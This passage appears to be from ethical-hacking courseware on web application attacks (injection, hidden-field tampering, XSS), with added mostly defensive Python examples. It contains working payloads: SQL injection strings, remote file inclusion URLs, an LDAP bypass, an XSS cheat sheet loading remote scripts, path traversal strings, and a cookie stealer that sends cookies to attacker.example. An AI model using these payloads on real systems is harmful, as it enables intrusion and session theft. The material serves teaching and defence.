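    with open(os.path.join(root, "somedir", "somefile"), "w") as fh:
        fh.write("public content\n")
    with open(os.path.join(base, "secret.txt"), "w") as fh:
        fh.write("must not be served\n")
    return root


if __name__ == "__main__":
    demo_root = build_demo_root()
    for path in ("/somedir/somefile", "/../secret.txt",
                 "/../../../../etc/passwd", "..%2F..%2F..%2Fetc%2Fpasswd"):
        verdict = "served" if is_safe(demo_root, path) else "blocked"
        print(f"{path:35} -> {verdict}")
```

A request that is blocked here is also worth logging with the raw (undecoded) path, since the encoded form is what an IDS signature will match on.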
Security Misconfiguration

Easy Exploitation: Using misconfiguration vulnerabilities, attackers gain unauthorized access to default accounts, read unused pages, exploit unpatched flaws, and read or write unprotected files and directories, etc.

Common Prevalence: Security misconfiguration can occur at any level of an application stack, including the platform, web server, application server, framework, and custom code.

Developers and network administrators should check that the entire stack is configured properly, as security misconfiguration can happen at any level of an application stack, including the platform, web server, application server, framework, and custom code. For instance, if the server is not configured properly, it results in various problems that can affect the security of a website. The problems that lead to such instances include server software flaws, unpatched security flaws, enabling unnecessary services, and improper authentication. A few of these problems can be detected easily with the help of automated scanners. Attackers can access default accounts, unused pages, unpatched flaws, unprotected files and directories, etc. to gain unauthorized access. All the unnecessary and unsafe features have to be taken care of, and it proves very beneficial if they are completely disabled so that outsiders don't make use of them for malicious attacks. All the application-based files have to be taken care of through proper authentication and strong security methods, or crucial information can be leaked to the attackers. Examples of unnecessary features that should be disabled or changed include:

- The application server admin console is automatically installed and not removed
- Default accounts are not changed
- Attacker discovers the standard admin pages on the server, logs in with default passwords, and takes over
Injection Flaws

Injection flaws are web application vulnerabilities that allow untrusted data to be interpreted and executed as part of a command or query. Attackers exploit injection flaws by constructing malicious commands or queries that result in data loss or corruption, lack of accountability, or denial of access. Injection flaws are prevalent in legacy code, often found in SQL, LDAP, and XPath queries, etc., and can be easily discovered by application vulnerability scanners and fuzzers.

- SQL injection: the injection of malicious SQL queries into user input forms
- Command injection: the injection of malicious code through a web application
- LDAP injection: the injection of malicious LDAP statements

Injection flaws are loopholes in the web application that allow unreliable data to be interpreted and executed as part of a command or query. Attackers exploit injection flaws by constructing malicious commands or queries that result in loss or corruption of data, lack of accountability, or denial of access. Injection flaws are prevalent in legacy code, often found in SQL, LDAP, and XPath queries, etc. These flaws can be detected easily by application vulnerability scanners and fuzzers. By exploiting the flaws in the web application, the attacker can easily read, write, delete, and update any data, whether or not it is relevant to that particular application. There are many types of injection flaws; some of them are as follows:

SQL injection

SQL injection is the most common website vulnerability on the Internet. It is the technique used to take advantage of non-validated input vulnerabilities to pass SQL commands through a web application for execution by a backend database. In this attack, the attacker injects malicious SQL queries into the user input form, usually either to gain unauthorized access to a database or to retrieve information directly from the database.

Command injection

Command injection flaws are another type of web application vulnerability. These flaws are highly dangerous. In this type of attack, the attacker injects malicious code via a web application.

LDAP injection

LDAP injection is an attack method in which websites that construct LDAP statements from user-supplied input are exploited for launching attacks. When an application fails to sanitize user input, the LDAP statement can be modified with the help of a local proxy. This in turn results in the execution of arbitrary commands, such as granting access to unauthorized queries and altering the content inside the LDAP tree.
SQL Injection Attacks

SQL injection attacks use a series of malicious SQL queries to directly manipulate the database. An attacker can use a vulnerable web application to bypass normal security measures and obtain direct access to valuable data. SQL injection attacks can often be executed from the address bar, from within application fields, and through queries and searches.

Note: For complete coverage of SQL injection concepts and techniques, refer to Module 14: SQL Injection.

SQL injection attacks use command sequences from Structured Query Language (SQL) statements to control database data directly. Applications often use SQL statements to authenticate users to the application, validate roles and access levels, store and obtain information for the application and user, and link to other data sources. Using SQL injection methods, an attacker can use a vulnerable web application to avoid normal security measures and obtain direct access to valuable data.

The reason SQL injection attacks work is that the application does not properly validate input before passing it to a SQL statement. For example, the following SQL statement,

SELECT * FROM tablename WHERE UserID = 2302

becomes the following with a simple SQL injection attack:

SELECT * FROM tablename WHERE UserID = 2302 OR 1=1

The expression "OR 1=1" evaluates to the value "TRUE," often allowing the enumeration of all user ID values from the database. SQL injection attacks can often be entered from the address bar, from within application fields, and through queries and searches.

SQL injection attacks can allow an attacker to:

- Log in to the application without supplying valid credentials
- Perform queries against data in the database, often even data to which the application would not normally have access
- Modify the database contents, or drop the database altogether
- Use the trust relationships established between the web application components to access other databases

FIGURE: SQL Injection Attacks. The vulnerable server code interpolates the user-supplied values straight into the INSERT statement:

    <?php
    function save_email($user, $message)
    {
        $sql = "INSERT INTO Messages (
            user, message
        ) VALUES (
            '$user', '$message'
        )";
        return mysql_query($sql);
    }
    ?>

When the attacker supplies the following as the user value, the resulting statement drops the Messages table once it is sent to the database server:

    test'); DROP TABLE Messages; --

A second input inserts spammy data on behalf of other users:

    test'), ('user2', 'I am Jason'), ('user3', 'You are hacked
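The UserID = 2302 OR 1=1 case from the text, run against an in-memory SQLite table next to the parameterised query that closes the hole. Added example, not code from the module; the table "tablename" and its rows are constructed.

```python
"""Added example, not code from the CEH module: the UserID=2302 OR 1=1 case
from the text, run against an in-memory SQLite table ("tablename" and its rows
are constructed), next to a parameterised query that closes the hole."""
import sqlite3
from typing import List, Tuple


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the module's 'tablename'."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tablename (UserID INTEGER, name TEXT)")
    conn.executemany(
        "INSERT INTO tablename VALUES (?, ?)",
        [(2301, "alice"), (2302, "bob"), (2303, "carol")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_id: str) -> List[Tuple]:
    """Builds the statement by string concatenation, so whatever the client
    sends becomes part of the SQL grammar: '2302 OR 1=1' returns every row."""
    sql = "SELECT UserID, name FROM tablename WHERE UserID = " + user_id
    return conn.execute(sql).fetchall()


def lookup_parameterised(conn: sqlite3.Connection, user_id: str) -> List[Tuple]:
    """Binds the value instead. The driver ships the text as a literal, so
    'OR 1=1' is compared against the column as data and matches nothing."""
    sql = "SELECT UserID, name FROM tablename WHERE UserID = ?"
    return conn.execute(sql, (user_id,)).fetchall()


def lookup_validated(conn: sqlite3.Connection, user_id: str) -> List[Tuple]:
    """Defence in depth: reject anything that is not an integer before the
    database ever sees it, then bind the parsed value."""
    try:
        uid = int(user_id, 10)
    except ValueError:
        raise ValueError("UserID must be an integer, got %r" % user_id)
    return conn.execute(
        "SELECT UserID, name FROM tablename WHERE UserID = ?", (uid,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, "2302"))            # one row
    print(lookup_vulnerable(db, "2302 OR 1=1"))     # every row: the injection
    print(lookup_parameterised(db, "2302 OR 1=1"))  # [] : value, not SQL
```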
Command Injection Attacks

Command injection flaws allow attackers to pass malicious code to different systems via a web application. The attacks include calls to the operating system over system calls, use of external programs over shell commands, and calls to the backend databases over SQL. Scripts written in Perl, Python, and other languages can be executed and injected into poorly designed web applications. If a web application uses any type of interpreter, attacks are inserted to inflict damage. To perform their functions, web applications must use operating system features and external programs. Although many programs are invoked externally, the most frequently used program is Sendmail. When a piece of information is passed through the HTTP external request, it must be carefully scrubbed, or the attacker can insert special characters, malicious commands, and command modifiers into the information. The web application then blindly passes these characters to the external system for execution. Inserting SQL is dangerous and rather widespread, as it is a form of command injection. Command injection attacks are easy to carry out and discover, but they are tough to understand.

Shell injection

To complete various functionalities, web applications use various applications and programs, just like sending an email by using the UNIX sendmail program. There is a chance that an attacker may inject code into these programs. This kind of attack is dangerous, especially to web page security. These injections allow intruders to perform various types of malicious attacks against the user's server. An attacker tries to craft an input string to gain shell access to a web server. Shell injection functions include system(), StartProcess(), java.lang.Runtime.exec(), System.Diagnostics.Process.Start(), and similar APIs.

HTML embedding

This type of attack is used to deface websites virtually. Using this attack, an attacker adds extra HTML-based content to the vulnerable web application. In HTML embedding attacks, user input to a web script is placed into the output HTML without being checked for HTML code or scripting.

File injection

The attacker exploits this vulnerability and injects malicious code into system files:

http://www.juggyboy.com/vulnerable.php?COLOR=http://evil/exploit

Users are allowed to upload various files to the server through various applications, and those files can be accessed through the Internet from any part of the world. If the file ends with a php extension and any user requests it, then the application interprets it as a php script and executes it. This allows an attacker to perform arbitrary commands.
Command Injection Example

The following is an example of command injection. To perform a command injection attack, the attacker first enters malicious code (account number) with a new password. The last two sets of numbers are the banner size. Once the attacker clicks the submit button, the password for the account 1036 is changed to "newpassword." The server script assumes that only the URL of the banner image file is inserted into that field. Poor input validation at the server script was exploited in this attack, which uses the database INSERT and UPDATE record commands.

FIGURE: Command Injection Example. The attacker submits the banner registration form at http://juggyboy.com/cgi-bin/lspro/lspro.cgi?hit_out=1036 (User Name: Addison; Address: addi@juggyboy.com; Site URL: www.juggyboy.com; Password: newpassword) with the malicious code in the Banner URL field:

    www.juggyboy.com/banner.gif|newpassword|1036|60|468
File Injection Attack

File injection attacks enable attackers to exploit vulnerable scripts on the server to use a remote file instead of a presumably trusted file from the local file system.

Users are allowed to upload various files to the server through various applications, and those files can be accessed through the Internet from anywhere in the world. If the file ends with a php extension and any user requests it, then the application interprets it as a php script and executes it. This allows an attacker to perform arbitrary commands. File injection attacks enable attackers to exploit vulnerable scripts on the server to use a remote file instead of a presumably trusted file from the local file system.

Consider the following client code running in a browser:

    <form method="get">
    <select name="DRINK">
    <option value="pepsi">pepsi</option>
    <option value="coke">coke</option>
    </select>
    <input type="submit">
    </form>

Vulnerable PHP code (the DRINK parameter is passed straight to require(), so any path or URL the client supplies is included and executed):

    <?php
    $drink = 'coke';
    if (isset($_GET['DRINK']))
        $drink = $_GET['DRINK'];
    require($drink . '.php');
    ?>

To exploit the vulnerable php code, the attacker injects a remotely hosted file at www.jasoneval.com containing an exploit.

Exploit code:

    http://www.juggyboy.com/orders.php?DRINK=http://jasoneval.com/exploit?
What Is LDAP Injection?

An LDAP injection technique is used to take advantage of non-validated web application input vulnerabilities to pass LDAP filters used for searching Directory Services, in order to obtain direct access to the databases behind an LDAP tree.

LDAP Directory Services store and organize information based on its attributes. The information is hierarchically organized as a tree of directory entries. LDAP is based on the client-server model, and clients can search the directory entries using filters.

An LDAP (Lightweight Directory Access Protocol) injection attack works in the same way as a SQL injection attack. All inputs to the LDAP must be properly filtered; otherwise vulnerabilities in LDAP allow executing unauthorized queries or modification of the contents. LDAP attacks exploit web-based applications constructed from LDAP statements by using a local proxy. LDAP statements are modified when certain applications fail to sanitize input. These services store and organize information based on its attributes. The information is hierarchically organized as a tree of directory entries. LDAP is based on the client-server model, and clients can search the directory entries using filters.

Filter syntax: (attributeName operator value)

    Operator    Example
    =           (objectclass=user)
    >=          (mdbstoragequota>=100000)
    <=          (mdbstoragequota<=100000)
    ~=          (displayname~=Foeckeler)
    *           (displayname=*John*)
    AND (&)     (&(objectclass=user)(displayname=John))
    OR (|)      (|(objectclass=user)(displayname=John))
    NOT (!)     (!objectclass=group)

FIGURE: LDAP Injection (filter syntax and operators as tabulated above)
How LDAP Injection Works

LDAP injection attacks are similar to SQL injection attacks but exploit user parameters to generate the LDAP query. LDAP injection attacks are commonly used on web applications; they apply to any application that has some kind of user input used to generate LDAP queries. To test if an application is vulnerable to LDAP code injection, send a query to the server that generates an invalid input. If the LDAP server returns an error, it can be exploited with code injection techniques. Depending upon the implementation of the target, one can try to achieve:

- Login bypass
- Information disclosure
- Privilege escalation
- Information alteration

FIGURE: Normal operation (the client sends a normal query to the LDAP server and receives the normal result)

FIGURE: Operation with code injection (the client sends the normal query plus injected code; the LDAP server returns the normal result and/or additional information)

Attack: If an attacker enters a valid user name of "juggyboy" and injects juggyboy)(&)), then the URL string becomes (&(USER=juggyboy)(&))(PASS=blah)). Only the first filter is processed by the LDAP server; that is, only the query (&(USER=juggyboy)(&)) is processed. This query is always true, and the attacker logs in to the system without a valid password.

FIGURE: Attack (account login form with Username: juggyboy)(&)) and Password: blah)
Hidden Field Manipulation Attack

When a user makes selections on an HTML page, the selection is typically stored as form field values and sent to the application as an HTTP request (GET or POST). HTML can also store field values as hidden fields, which are not rendered to the screen by the browser but are collected and submitted as parameters during form submission. Attackers can examine the HTML code of the page and change the hidden field values in order to change the POST requests sent to the server.

Hidden field manipulation attacks are mostly used against e-commerce websites today. Many online stores face these problems. In every client session, developers use hidden fields to store client information, including the price of the product (including discount rates). At the time of development of such programs, developers feel that all the applications developed by them are safe, but a hacker can manipulate the price of the product and complete a transaction with the price that he or she has altered, rather than the actual price of the product. For example: on eBay, a particular mobile phone is for sale for $1000 and the hacker, by altering the price, gets it for only $10. This is a huge loss for website owners. To protect their networks from attacks, website owners are using the latest antivirus software, firewalls, intrusion detection systems, etc. If their website is attacked, it often also loses its credibility in the market.

When a target requests web services and makes choices on the HTML page, the choices are saved as form field values and delivered to the requested application as an HTTP request (GET or POST). HTML pages generally save field values as hidden fields; they are not displayed on the target's monitor but are saved and sent as strings or parameters at the time of form submission. Attackers can examine the HTML code of the page and change the hidden field values in order to change the POST requests sent to the server.

HTML code:

    <form method="post" action="page.aspx">
    <input type="hidden" name="PRICE" value="200.00">
    Product name: <input type="text" name="product" value="Juggyboy Shirt"><br>
    Product price: 200.00<br>
    <input type="submit" value="submit">
    </form>

1. Open the HTML page within an HTML editor.
2. Locate the hidden field (e.g., "<type=hidden name=price value=200.00>").
3. Modify its content to a different value (e.g., "<type=hidden name=price value=2.00>").
4. Save the HTML file locally and browse it.
5. Click the Buy button to perform electronic shoplifting via hidden field manipulation.

Normal request:

    http://www.juggyboy.com/page.aspx?product=Juggyboy%20Shirt&price=200.00

Attack request:

    http://www.juggyboy.com/page.aspx?product=Juggyboy%20Shirt&price=2.00

FIGURE: Hidden Field Manipulation Attack (the order form for "Juggyboy Shirt" with its hidden PRICE field, the normal request and the altered attack request)
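The server-side counterpart to the steps above: the order handler for page.aspx re-reads the price from its own catalogue and treats a disagreeing PRICE field as a tampering signal rather than a price, and, for hidden fields that genuinely must carry state, signs them with an HMAC so browser-side edits are detectable. Added example, not code from the module; the catalogue, the signing key and the form data are constructed.

```python
"""Added example, not code from the CEH module: processing the page.aspx order
form from the text without trusting the hidden PRICE field. The catalogue,
signing key and form data are constructed for the demonstration."""
import hashlib
import hmac
from decimal import Decimal, InvalidOperation
from typing import Dict, Optional
from urllib.parse import parse_qs

# Authoritative prices live on the server; the browser never gets to set them.
CATALOGUE = {"Juggyboy Shirt": Decimal("200.00")}

# Constructed signing key for the second defence (would come from config).
SIGNING_KEY = b"constructed-demo-key-rotate-me"


def handle_order(query_string: str) -> Dict[str, object]:
    """Parse product=...&price=... as the form submits it and decide what to
    charge. The price is always re-read from CATALOGUE; a submitted price that
    disagrees is flagged for logging/alerting but never honoured."""
    params = parse_qs(query_string, keep_blank_values=True)
    product = params.get("product", [""])[0]
    if product not in CATALOGUE:
        raise KeyError("unknown product %r" % product)
    real_price = CATALOGUE[product]
    submitted = params.get("price", [None])[0]
    try:
        tampered = submitted is not None and Decimal(submitted) != real_price
    except InvalidOperation:
        tampered = True  # non-numeric garbage in the field is tampering too
    return {
        "product": product,
        "charge": real_price,       # what is actually billed
        "submitted": submitted,     # what the client claimed, for the log
        "tampered": tampered,
    }


def _tag(name: str, value: str) -> str:
    """HMAC-SHA256 over 'name=value' so a tag cannot be moved between fields."""
    return hmac.new(SIGNING_KEY, ("%s=%s" % (name, value)).encode(),
                    hashlib.sha256).hexdigest()


def sign_hidden_field(name: str, value: str) -> str:
    """Emit a hidden field value as '<value>.<tag>' so any edit made in the
    browser is detectable when the form comes back."""
    return "%s.%s" % (value, _tag(name, value))


def verify_hidden_field(name: str, signed: str) -> Optional[str]:
    """Return the value if its tag verifies, else None. compare_digest keeps
    the comparison constant-time so the tag cannot be guessed byte by byte."""
    value, sep, tag = signed.rpartition(".")
    if not sep:
        return None
    return value if hmac.compare_digest(tag, _tag(name, value)) else None


if __name__ == "__main__":
    print(handle_order("product=Juggyboy%20Shirt&price=200.00"))  # tampered: False
    print(handle_order("product=Juggyboy%20Shirt&price=2.00"))    # tampered: True, charge 200.00
    signed = sign_hidden_field("PRICE", "200.00")
    print(verify_hidden_field("PRICE", signed))                   # 200.00
    print(verify_hidden_field("PRICE", "2.00." + signed.split(".")[-1]))  # None
```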
Cross-Site Scripting (XSS) Attacks

Cross-site scripting ("XSS" or "CSS") attacks exploit vulnerabilities in dynamically generated web pages, which enables malicious attackers to inject client-side script into web pages viewed by other users. It occurs when invalidated input data is included in dynamic content that is sent to a user's web browser for rendering. Attackers inject malicious JavaScript, VBScript, ActiveX, HTML, or Flash for execution on a victim's system by hiding it within legitimate requests.

Cross-site scripting is also called XSS. The vulnerability occurs when an attacker uses a web application to send malicious JavaScript code to different end users. It occurs when invalidated input data is included in dynamic content that is sent to a user's web browser for rendering. When a web application uses input from a user, an attacker can commence an attack using that input, which can propagate to other users as well. Attackers inject malicious JavaScript, VBScript, ActiveX, HTML, or Flash for execution on a victim's system by hiding it within legitimate requests. The end user may trust the web application, and the attacker can exploit that trust in order to do things that would not be allowed under normal conditions. An attacker often uses different methods to encode the malicious portion of the tag (Unicode), so that a request seems genuine to the user. Some of the things an attacker can achieve are:

- Malicious script execution
- Session hijacking
- Brute force password cracking
- Redirecting to a malicious server
- Exploiting user privileges
- Data theft
- Intranet probing
- Ads in hidden iframes and pop-ups
- Data manipulation
- Keylogging and remote monitoring
How XSS Attacks Work

To understand how cross-site scripting is typically exploited, consider the following hypothetical example. The vulnerable page handles requests for a nonexistent page, a classic 404 error page.

Normal request:

    http://juggyboy.com/jason_file.html

Server response:

    404 Not found: /jason_file.html

Server code (handles requests for a nonexistent page, a classic 404 error page; the requested URI is echoed back into the page without encoding):

    <html>
    <body>
    <?php
    print "Not found: " . urldecode($_SERVER["REQUEST_URI"]);
    ?>
    </body>
    </html>

XSS attack code:

    http://juggyboy.com/<script>alert("WARNING: The application has encountered an error");</script>

FIGURE 13.15: How XSS Attacks Work
Cross-Site Scripting Attack Scenario: Attack via Email

In a cross-site scripting attack via email, the attacker crafts an email that contains a link to a malicious script and sends it to the victim:

Hi, You have won a lottery of $2M, click the link to claim it. <A HREF=http://juggyboy.com/...

Malicious Script:
<A HREF="http://legitimateSite.com/registration.cgi?clientprofile=<SCRIPT>malicious code</SCRIPT>">Click here</A>

When the user clicks on the link, the URL is sent to legitimateSite.com with the malicious code. The legitimate server sends a page back to the user that includes the value of clientprofile, so the malicious code is executed on the client machine, in the browser's security context for legitimateSite.com.

In the slide's figure the server returns the victim's profile page (Name: Shaun, Age: 31, Location: UK, Occupation: SE, Last visit: Sept 21, 2010) with the attacker's script embedded in it.
The following diagram depicts the cross-site scripting attack scenario, attack via email: the attacker sends an email with the malicious link, the user clicks the link, the request is received by the legitimate server, the server sends a page to the user with the client profile, and the malicious code is executed in the client web browser.
Module 13 Page 1783

FIGURE: Attack via Email
Module 13 Page 1784
XSS Example: Attack via Email

The following are the steps involved in an XSS attack via email:
1. Construct a malicious link: <A HREF="http://juggyboybank.com/registration.cgi?clientprofile=<SCRIPT>malicious code</SCRIPT>">Click here</A>
2. Email the URL to the user and convince the user to click on it.
3. The user's browser requests the page from the legitimate server.
4. The legitimate server sends a response page with the malicious script.
5. The malicious script runs in the user's browser.
Module 13 Page 1785
FIGURE: Attack via Email (User's Browser, Malicious Script, Attacker's Server, Legitimate Server)
Module 13 Page 1786
XSS Example: Stealing Users' Cookies

To steal the user's cookies with the help of an XSS attack, the attacker looks for XSS vulnerabilities and then installs a cookie stealer (cookie logger). The following are the various steps involved in stealing a user's cookies with the help of an XSS attack:
1. The attacker initially hosts a page with the malicious script.
2. The user visits the page hosted by the attacker.
3. The attacker's server sends the response as HTML containing the malicious script.
4. The user's browser runs the malicious script.
5. The cookie logger present in the malicious script collects the user's cookies (by reading document.cookie).
6. The malicious script redirects the user to the attacker's server.
7. The user's browser sends the request to the attacker's server with the user's cookie values carried in it.

Two caveats a tester should keep in mind: the script can only read cookies belonging to the origin it executes in, so the logger has to be injected into the vulnerable site's own page rather than a page the attacker merely hosts; and cookies flagged HttpOnly are still sent by the browser but are not exposed through document.cookie, so this particular technique cannot read them.
Module 13 Page 1787
FIGURE: Stealing Users' Cookies
Module 13 Page 1788
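The collector side of the cookie logger, as an added example that is not part of the module: the injected script (steps 5 and 6), a parser for the request line the victim's browser sends to the attacker's endpoint (step 7), and the defender's check for which cookies document.cookie can see at all. The attacker host attacker.example, the /log path, the request line and the Set-Cookie headers are all assumptions constructed for the example.

```python
"""Cookie theft via XSS: attacker-side collector plus the HttpOnly caveat.

Added example, not from the CEH module. attacker.example and /log are hypothetical;
the stolen request line and the Set-Cookie headers are constructed sample data.
"""
from http.cookies import SimpleCookie
from urllib.parse import parse_qs, quote, urlsplit

COLLECTOR = "http://attacker.example/log"   # hypothetical attacker endpoint


def cookie_stealer_payload(collector: str = COLLECTOR) -> str:
    """The injected script: read document.cookie and redirect the browser to the
    collector with the cookie string in the query (the text's cookie logger)."""
    return ("<script>document.location='%s?c='+encodeURIComponent(document.cookie)</script>"
            % collector)


def cookies_from_request_line(request_line: str) -> dict:
    """Attacker side: recover the stolen cookies from the GET line the victim's browser sent."""
    method, target, _version = request_line.split(" ", 2)
    if method != "GET":
        raise ValueError("collector only expects the redirect GET")
    query = parse_qs(urlsplit(target).query)
    raw = query.get("c", [""])[0]         # parse_qs has already percent-decoded the value
    jar = SimpleCookie()
    jar.load(raw)
    return {name: morsel.value for name, morsel in jar.items()}


def script_readable_cookies(set_cookie_headers: list) -> list:
    """Defender side: which of these cookies can document.cookie see? HttpOnly cookies
    are still attached to requests by the browser but are invisible to script, so the
    payload above cannot exfiltrate them."""
    visible = []
    for header in set_cookie_headers:
        jar = SimpleCookie()
        jar.load(header)
        for name, morsel in jar.items():
            if not morsel["httponly"]:
                visible.append(name)
    return visible


# Constructed: what the victim's browser sends to the collector after the redirect.
STOLEN_REQUEST = "GET /log?c=" + quote("SESSIONID=325896ASDD23SA3587; BasketSize=3") + " HTTP/1.1"
# Constructed: two cookies the application might set, one of them HttpOnly.
SET_COOKIES = [
    "SESSIONID=325896ASDD23SA3587; Path=/; Secure; HttpOnly",
    "BasketSize=3; Path=/",
]

if __name__ == "__main__":
    print(cookie_stealer_payload())
    print(cookies_from_request_line(STOLEN_REQUEST))
    print("readable by script:", script_readable_cookies(SET_COOKIES))
```

The point of the last function is the defensive one: marking the session cookie HttpOnly does not stop the XSS, but it takes session hijacking by this payload off the table, which is why it should be the default for any cookie the page's own scripts do not need.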
XSS Example: Sending an Unauthorized Request

Using an XSS attack, the attacker can also send an unauthorized request on the victim's behalf. The following are the steps involved in an XSS attack intended to send an unauthorized request:
1. The attacker constructs a malicious link.
2. The attacker sends an email containing the URL to the user and convinces the user to click on it.
3. The user's browser sends a request to the attacker's server for the page.
4. The attacker's server, in response to the user's request, sends the page with the malicious script.
5. The user's browser runs the malicious script.
6. The malicious script sends an unauthorized request, which the receiving server cannot distinguish from one the user made deliberately.
Module 13 Page 1789
FIGURE: Sending an Unauthorized Request
Module 13 Page 1790
XSS Attack in a Blog Posting

The following diagram depicts an XSS attack in a blog posting. The attacker adds a malicious script in the comment field of a blog post; the malicious code

<script>onload=window.location='http://www.juggyboy.com'</script>

is injected into the blog post. The comment with the malicious link is stored on the server (database server), so every user who later loads the post through the web application is redirected to the malicious website juggyboy.com.

FIGURE 13.20: XSS Attack in a Blog Posting
Module 13 Page 1791
XSS Attack in a Comment Field

The slide walks through the attack on a sample site, ITechPost: the user visits the ITechPost website and reads a post ("Facebook acquires file-sharing service: New York-based start-up that lets users privately and sporadically share files through a drag-and-drop interface with additional options") that already carries a benign comment ("Jason, I love your blog post! - Mark"). The attacker leaves the comment

Jason, I love your blog post! <script>alert("Hello World")</script>

The malicious code <script>alert("Hello World")</script> is injected into the blog post, the comment with the malicious script is stored on the database server, and the alert pops up in a pop-up window as soon as the web page is loaded, for every visitor who reads the post.

Many Internet web programs use HTML pages that dynamically accept data from different sources. The data in the HTML pages can be dynamically changed according to the request. Attackers use the HTML web page's tags to manipulate the data and launch the attack by turning the comments feature into a carrier for a malicious script. When the target views the page with the comment, the malicious script is executed in the target's browser and performs whatever actions the attacker scripted. Because the script is stored on the server and replayed to every visitor, this is a stored (persistent) XSS, unlike the reflected examples above, where the payload travels in the victim's own request.
Module 13 Page 1792

FIGURE: XSS Attack in a Comment Field
Module 13 Page 1793
XSS Cheat Sheet

XSS locator: '';!--"<XSS>=&{()}
Normal XSS JavaScript injection: <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
Image XSS: <IMG SRC="javascript:alert('XSS');">
No quotes and no semicolon: <IMG SRC=javascript:alert('XSS')>
Case insensitive XSS attack vector: <IMG SRC=JaVaScRiPt:alert('XSS')>
HTML entities: <IMG SRC=javascript:alert(&quot;XSS&quot;)>
Grave accent obfuscation: <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
Malformed IMG tags: <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
Embedded tab: <IMG SRC="jav	ascript:alert('XSS');">   (a literal tab character inside "javascript")
Embedded encoded tab: <IMG SRC="jav&#x09;ascript:alert('XSS');">
Embedded newline: <IMG SRC="jav&#x0A;ascript:alert('XSS');">
Embedded carriage return: <IMG SRC="jav&#x0D;ascript:alert('XSS');">
Null chars: perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
Non-alpha-non-digit XSS: <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Non-alpha-non-digit part 2 XSS: <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
Extraneous open brackets: <<SCRIPT>alert("XSS");//<</SCRIPT>
No closing script tags: <SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
Protocol resolution in script tags: <SCRIPT SRC=//ha.ckers.org/.j>
Half open HTML/JavaScript XSS vector: <IMG SRC="javascript:alert('XSS')"
Double open angle brackets: <iframe src=http://ha.ckers.org/scriptlet.html <
XSS with no single quotes or double quotes or semicolons: <SCRIPT>alert(/XSS/.source)</SCRIPT>
Escaping JavaScript escapes: \";alert('XSS');//
End title tag: </TITLE><SCRIPT>alert("XSS");</SCRIPT>
INPUT image: <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
IMG Dynsrc: <IMG DYNSRC="javascript:alert('XSS')">
IMG lowsrc: <IMG LOWSRC="javascript:alert('XSS')">
BGSOUND: <BGSOUND SRC="javascript:alert('XSS');">
LAYER: <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
STYLE sheet: <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
Local .htc file: <XSS STYLE="behavior: url(xss.htc);">
VBscript in an image: <IMG SRC='vbscript:msgbox("XSS")'>
Mocha: <IMG SRC="livescript:[code]">
US-ASCII encoding: ¼script¾alert(¢XSS¢)¼/script¾
META: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
TABLE: <TABLE BACKGROUND="javascript:alert('XSS')">
TD: <TABLE><TD BACKGROUND="javascript:alert('XSS')">

Many of these vectors (DYNSRC, LOWSRC, BGSOUND, LAYER, behavior:, vbscript:, livescript:, and javascript: URLs in image sources) only ever worked in old browser engines. They remain useful as a test corpus for input filters: a filter that matches the literal string "javascript:" misses the tab, newline, entity, NUL and case variants listed here.

FIGURE 13.22: XSS Cheat Sheet
Module 13 Page 1794
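A filter test harness for the cheat sheet, added here and not part of the module: it runs the obfuscated javascript: vectors above through the naive substring check many applications ship and through an allow-list scheme check that normalises HTML entities, percent-encoding, control characters and case before looking at the scheme. The allow-list itself (http, https, mailto) and the sample legitimate URLs are assumptions.

```python
"""Why naive "javascript:" filtering fails against the cheat-sheet obfuscations.

Added example, not from the CEH module. The allow-list approach and the sample
legitimate URLs are assumptions; the attack URLs are the cheat sheet's own vectors.
"""
import html
import re
from urllib.parse import unquote

SAFE_SCHEMES = {"http", "https", "mailto"}      # assumption: what this application links to
_CONTROL_AND_SPACE = re.compile(r"[\x00-\x20\x7f]")


def naive_filter_blocks(url: str) -> bool:
    """The broken check: case-sensitive substring match on the raw input."""
    return "javascript:" in url


def normalise_url(url: str) -> str:
    """Undo the tricks browsers tolerate before the scheme is compared:
    HTML entities (jav&#x09;ascript), percent-encoding (%6Aavascript),
    embedded tab/newline/CR/NUL (jav<TAB>ascript, java\\0script) and case."""
    url = html.unescape(url)
    url = unquote(url)
    url = _CONTROL_AND_SPACE.sub("", url)
    return url.lower()


def url_is_safe(url: str) -> bool:
    """Allow-list the scheme. A URL with no scheme before the first '/' or '?' is
    relative (or protocol-relative, //host/...) and is accepted; anything with a
    scheme outside SAFE_SCHEMES (javascript:, vbscript:, livescript:, data:, ...)
    is rejected."""
    cleaned = normalise_url(url)
    head = cleaned.split("/", 1)[0].split("?", 1)[0]
    if ":" not in head:
        return True
    return head.split(":", 1)[0] in SAFE_SCHEMES


# Vectors taken from the cheat sheet (SRC attribute values only).
CHEAT_SHEET_VECTORS = [
    "javascript:alert('XSS');",
    "JaVaScRiPt:alert('XSS')",
    "jav&#x09;ascript:alert('XSS');",
    "jav&#x0A;ascript:alert('XSS');",
    "jav&#x0D;ascript:alert('XSS');",
    "jav\tascript:alert('XSS');",
    "java\0script:alert(\"XSS\")",
    "%6A%61%76%61script:alert('XSS')",
    "vbscript:msgbox(\"XSS\")",
    "livescript:[code]",
]
# Constructed legitimate links the filter must keep working.
LEGITIMATE_URLS = [
    "http://ha.ckers.org/xss.js",
    "https://juggyboy.com/page.html?next=/jason_file.html",
    "/jason_file.html",
    "mailto:[email protected]",
]


def audit(urls) -> dict:
    """For each URL: (blocked by the naive filter?, accepted by the allow-list?)."""
    return {u: (naive_filter_blocks(u), url_is_safe(u)) for u in urls}


if __name__ == "__main__":
    for url, (naive_blocked, allowed) in audit(CHEAT_SHEET_VECTORS + LEGITIMATE_URLS).items():
        print("%-40r naive_blocks=%-5s allowlist_accepts=%s" % (url, naive_blocked, allowed))
```

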